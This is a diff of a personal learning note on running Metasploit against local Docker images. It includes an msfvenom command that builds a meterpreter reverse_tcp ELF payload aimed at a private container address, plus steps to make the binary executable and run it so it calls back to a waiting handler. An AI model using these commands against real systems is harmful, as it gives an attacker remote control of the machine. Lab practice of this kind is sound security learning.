holycrap872/til/metasploit/running_local_images.md

 exploit -j
 ```

-2) In window (2), use msfvenom to download the meterpreter payload as a binary
+2) In window (2), use msfvenom to download a meterpreter payload as a binary.
+This payload (when configured properly), will connect with the open connection
+in step 1.

+> Substitute `XXXX` with correct calues

 ```
+cd /u4
-msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.17.0.4 LPORT=8888 -f elf X > payload.elf
+msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.17.0.XXX LPORT=XXXX -f elf X > payload.elf
+chmod 775 payload.elf
 ```

 3) In window (2), run the downloaded binary to establish a connection with metasploit